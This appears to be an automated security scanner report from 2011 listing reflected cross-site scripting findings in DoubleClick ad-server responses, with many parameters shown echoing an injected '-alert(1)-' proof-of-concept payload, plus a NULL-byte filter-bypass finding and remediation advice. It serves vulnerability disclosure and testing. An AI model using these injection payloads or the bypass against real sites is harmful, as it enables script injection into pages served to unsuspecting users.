Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:14:57 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... u%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=184995007a245"-alert(1)-"cb1a8ffbfb9&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d25"-alert(1)-"54e88c0450 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6777 Date: Tue, 28 Jun 2011 02:13:32 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 5129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=1168342d25"-alert(1)-"54e88c0450&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92266"-alert(1)-"754641c9b37 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6667 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 02:15:09 GMT Expires: Tue, 28 Jun 2011 02:15:09 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=92266"-alert(1)-"754641c9b37http://learn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6a7"-alert(1)-"38985baca84 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:11:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 515392/1%3Bu%3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245bb6a7"-alert(1)-"38985baca84&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 247bf"-alert(1)-"bcccf64206b was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5631 Date: Tue, 28 Jun 2011 03:07:00 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428247bf"-alert(1)-"bcccf64206b&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone"); var wmode = "opaque"; var bg ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93190"-alert(1)-"bf63948427f was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5739 Date: Tue, 28 Jun 2011 03:08:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 0%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=1793440593190"-alert(1)-"bf63948427f&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone"); var wmode = "opaque"; var bg = "same as S ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2df8"-alert(1)-"1d6528d0a37 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5741 Date: Tue, 28 Jun 2011 03:07:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341f2df8"-alert(1)-"1d6528d0a37&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_fol.html%3F__source%3Domd_fol_Outer_xplusone"); var wmode = "opaque"; var bg = "same ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dab"-alert(1)-"15ea4c0569c was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5631 Date: Tue, 28 Jun 2011 03:06:11 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 1001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=9795614dab"-alert(1)-"15ea4c0569c&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone"); va ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd794"-alert(1)-"41d93ebe777 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5668 Date: Tue, 28 Jun 2011 03:06:38 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288dd794"-alert(1)-"41d93ebe777&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone"); var wmode = "op ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a54e"-alert(1)-"f7737f749a5 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5725 Date: Tue, 28 Jun 2011 03:05:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=156493a54e"-alert(1)-"f7737f749a5&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Out ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8672a"-alert(1)-"4eda465726c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5735 Date: Tue, 28 Jun 2011 03:08:40 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 71/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=979568672a"-alert(1)-"4eda465726c&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptac ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7281a"-alert(1)-"90e990131bf was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5631 Date: Tue, 28 Jun 2011 03:09:05 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... %3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=179410017281a"-alert(1)-"90e990131bf&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c87"-alert(1)-"ae535e6c623 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5739 Date: Tue, 28 Jun 2011 03:07:24 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683c2c87"-alert(1)-"ae535e6c623&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone"); var wmode = "opaq ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43b35"-alert(1)-"26719022c54 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5359 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 03:09:20 GMT Expires: Tue, 28 Jun 2011 03:09:20 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... /1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=43b35"-alert(1)-"26719022c54http://www.universalstudioshollywood.com/ticket_hotel.html?__source=omd_hotel_Outer_xplusone"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982d"-alert(1)-"af7369214d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5664 Date: Tue, 28 Jun 2011 03:05:29 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 966987/1%3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930e982d"-alert(1)-"af7369214d&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2da41"-alert(1)-"e30b3cebf4a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fbf"-alert(1)-"08481952506 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c38e3"-alert(1)-"32d625406f was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9d41"-alert(1)-"4c11fe208dc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97a47"-alert(1)-"b6016578f1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54176"-alert(1)-"35e05f8a498 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5976 Date: Tue, 28 Jun 2011 03:32:03 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=5354176"-alert(1)-"35e05f8a498&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "o ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cda"-alert(1)-"eecdafd0da1 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5976 Date: Tue, 28 Jun 2011 03:31:43 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747c3cda"-alert(1)-"eecdafd0da1&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79bd"-alert(1)-"583b910f332 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5976 Date: Tue, 28 Jun 2011 03:32:24 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c79bd"-alert(1)-"583b910f332&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptacces ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70284"-alert(1)-"c4ab2baee7c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5976 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 03:32:41 GMT Expires: Tue, 28 Jun 2011 03:32:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=70284"-alert(1)-"c4ab2baee7chttp%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afcf2"-alert(1)-"63efab65b02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5976 Date: Tue, 28 Jun 2011 03:31:26 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717afcf2"-alert(1)-"63efab65b02&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a3ba'-alert(1)-'01b7f7cedad was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6016 Date: Tue, 28 Jun 2011 02:54:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... %3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=1004485a3ba'-alert(1)-'01b7f7cedad&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0036e76"-alert(1)-"c692859c262 was submitted in the mt_adid parameter. This input was echoed as 36e76"-alert(1)-"c692859c262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6028 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 02:54:37 GMT Expires: Tue, 28 Jun 2011 02:54:37 GMT
